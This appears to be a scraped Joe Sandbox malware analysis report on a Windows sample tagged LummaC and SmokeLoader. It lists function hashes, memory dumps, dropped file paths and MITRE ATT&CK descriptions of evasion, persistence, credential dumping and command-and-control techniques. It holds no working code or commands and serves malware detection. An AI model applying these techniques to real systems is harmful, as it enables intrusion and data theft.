Opcode ID: f828dc5048065b2a4ea36b46b74603e476538ee5a3cf911f238680742ef889af
Instruction ID: b41702697780ce8cc3fe5a40758b726a0976a1275f5bfa8d02867d98df5d7179
Opcode Fuzzy Hash: f828dc5048065b2a4ea36b46b74603e476538ee5a3cf911f238680742ef889af
Instruction Fuzzy Hash: 41020D66A0F25386EA745A18A090B3EE790DBD4300FA14932E9CFC77B4CD2DF8539B51

Function 00007FF7A09D57C0 Relevance: 4.2, Strings: 3, Instructions: 410COMMON

Download Yara Rule

Strings

*ls, xrefs: 00007FF7A09D58C7
*ls, xrefs: 00007FF7A09D59FE
*ls, xrefs: 00007FF7A09D5D63

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: *ls$*ls$*ls
API String ID: 0-3118405165
Opcode ID: 6b274dccccb35f5f95b39d903b1cde6055285413bf085d91c5422f8376950b91
Instruction ID: 2bc3a1572f63816e38d74b1ebbd05e3254a25a8921ff11c70830064301f486e2
Opcode Fuzzy Hash: 6b274dccccb35f5f95b39d903b1cde6055285413bf085d91c5422f8376950b91
Instruction Fuzzy Hash: EFF11822E4F68387FA349614948863EA6D1EB44361FE54E36EA5DCB7F4CE2CF8409711

Function 00007FF7A09BFC10 Relevance: 3.1, Strings: 2, Instructions: 572COMMON

Download Yara Rule

Strings

H3C&, xrefs: 00007FF7A09C03F6
H3C&, xrefs: 00007FF7A09C0400

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: H3C&$H3C&
API String ID: 0-1770148612
Opcode ID: 293444d22200035bd8cd0b39f3f69fa6dd64bbc19e1a05dac3e0bea0ca0a8459
Instruction ID: 177b5d0c7d06464cd68615ba5c818b640aa47c79fdd72e6fd1746f89e2ffdb81
Opcode Fuzzy Hash: 293444d22200035bd8cd0b39f3f69fa6dd64bbc19e1a05dac3e0bea0ca0a8459
Instruction Fuzzy Hash: 6A32FF25A1E68B87D9749629909033EE690EBC57A0FA14932DD9DC7BF8CE2CF4904B11

Function 00007FF7A09BA9D0 Relevance: 3.0, Strings: 2, Instructions: 489COMMON

Download Yara Rule

Strings

;:, xrefs: 00007FF7A09BAB88
;:, xrefs: 00007FF7A09BB12B

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: ;:$;:
API String ID: 0-2197980198
Opcode ID: 99c94250f0b0a1126aeeff1d3f389baf56e5bcdeae9a13661fc78fb5ba748f89
Instruction ID: 20de300c4f5439ea4825c75e8bfe780040ea5a48798539e22962b69ef178d53a
Opcode Fuzzy Hash: 99c94250f0b0a1126aeeff1d3f389baf56e5bcdeae9a13661fc78fb5ba748f89
Instruction Fuzzy Hash: 43023537C0D6668B97259E29954006AF691F795770F475A20EEAA337E0C73CEE40CBE0

Function 00007FF7A099FB70 Relevance: 2.8, Strings: 2, Instructions: 275COMMON

Download Yara Rule

Strings

W!, xrefs: 00007FF7A099FBA7
W!, xrefs: 00007FF7A099FC06

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID: W!$W!
API String ID: 0-695975270
Opcode ID: 4d0958b0a765513eb7a7ebe740961f25a1d9790526d60d0cea0c1aa12fafe601
Instruction ID: 6a0e84bced7c554b9c5e9b3ec8ba683e391fc91d89e608854fad29971ee427bc
Opcode Fuzzy Hash: 4d0958b0a765513eb7a7ebe740961f25a1d9790526d60d0cea0c1aa12fafe601
Instruction Fuzzy Hash: 40B14027A0E14747E6645B2558B013EF6D4EB85391FA98832FE8DC37B4DE2CF8548B11

Function 00007FF7A09F4370 Relevance: .6, Instructions: 618COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f83be34c14db09b2e2451f9aaf754056a33dfea72b4446c3084df2289fb2a14b
Instruction ID: f36d48ab1e8357540a41300f864b5187104d68c0f117560938c03938f393855e
Opcode Fuzzy Hash: f83be34c14db09b2e2451f9aaf754056a33dfea72b4446c3084df2289fb2a14b
Instruction Fuzzy Hash: 8942FE37A0E6878EDA749619B08077EE3D0EB84755F928832DA8DD7BB4CE2CF5404B11

Function 00007FF7A09E7D60 Relevance: .6, Instructions: 583COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c914f04f0c72d6f6f234bdaf2faaf0dc496f32b016d4c8decd1dc890f50565f
Instruction ID: 2263b31a0fc5716671ce7fb2020c4a70acce5d5cee595b0978a6e865f94c88f3
Opcode Fuzzy Hash: 6c914f04f0c72d6f6f234bdaf2faaf0dc496f32b016d4c8decd1dc890f50565f
Instruction Fuzzy Hash: 0732FB32B1E743CAEA785614A49027FE292AF54750FA1053DE59E87FB4DE2CFC408762

Function 00007FF7A09A7000 Relevance: .5, Instructions: 495COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bdfbfd40190e6fb452e2618ab1c326b60adaf3c91ef0e3d706090eecc4a29c
Instruction ID: 82c18e35b0a0bc78d781044f9f17a0e67b38666137a2f7821d81eec8167b7dbb
Opcode Fuzzy Hash: 24bdfbfd40190e6fb452e2618ab1c326b60adaf3c91ef0e3d706090eecc4a29c
Instruction Fuzzy Hash: 68122A26A0E15347EA745A3858D123FE6A1AB40300FA64C32F6DEC77F4CA1DF9568B61

Function 00007FF7A09F2D70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF7A09F2E0D

Strings

FA2, xrefs: 00007FF7A09F2D85
FA2, xrefs: 00007FF7A09F2DE0
PG<;, xrefs: 00007FF7A09F2E2B
PG<;, xrefs: 00007FF7A09F2DE7

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID: FileRead
String ID: FA2$FA2$PG<;$PG<;
API String ID: 2738559852-1104478874
Opcode ID: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
Instruction ID: 153a9aeb7c2440b0583519d54f8c02695c7a30a48b1b19a156804b3d0394780c
Opcode Fuzzy Hash: 549626fc998a93f7196aedd83246cb6ff0aac4143817fa1c6f4222ec57e3cb48
Instruction Fuzzy Hash: 1E218B17A0D28349EA302A15940437ABA609B45765FA64E33FE5DCF7F0CA3CF8458760

Function 00007FF7A0A157D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 00007FF7A0A15840

Strings

9qJ, xrefs: 00007FF7A0A15820
8qJ, xrefs: 00007FF7A0A15800
9qJ, xrefs: 00007FF7A0A157E1

Memory Dump Source

Source File: 00000008.00000002.2796700871.00007FF7A0991000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF7A0990000, based on PE: true

Associated: 00000008.00000002.2796664942.00007FF7A0990000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796767126.00007FF7A0A1D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.2796814974.00007FF7A0A82000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7a0990000_3530.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID: 8qJ$9qJ$9qJ
API String ID: 3203483114-2728310733
Opcode ID: 98220400c060dd60d9889ceb9d04c9409702458335335f7592c4203a505f7b5b
Instruction ID: ed8a042ff597a5467eb62e841af2de713ed4b11f5a426dc6df5a2ec0e7e1a2b8
Opcode Fuzzy Hash: 98220400c060dd60d9889ceb9d04c9409702458335335f7592c4203a505f7b5b
Instruction Fuzzy Hash: 38015A1BE4E847C2FA746A3A14A1E3984C15B64741FF75C32D84EC63B0FD28F9826322

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: SmokeLoader

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6E8A.exe.log

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\3530.exe

C:\Users\user\AppData\Local\Temp\6E8A.exe

C:\Users\user\AppData\Local\Temp\7C81.exe

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre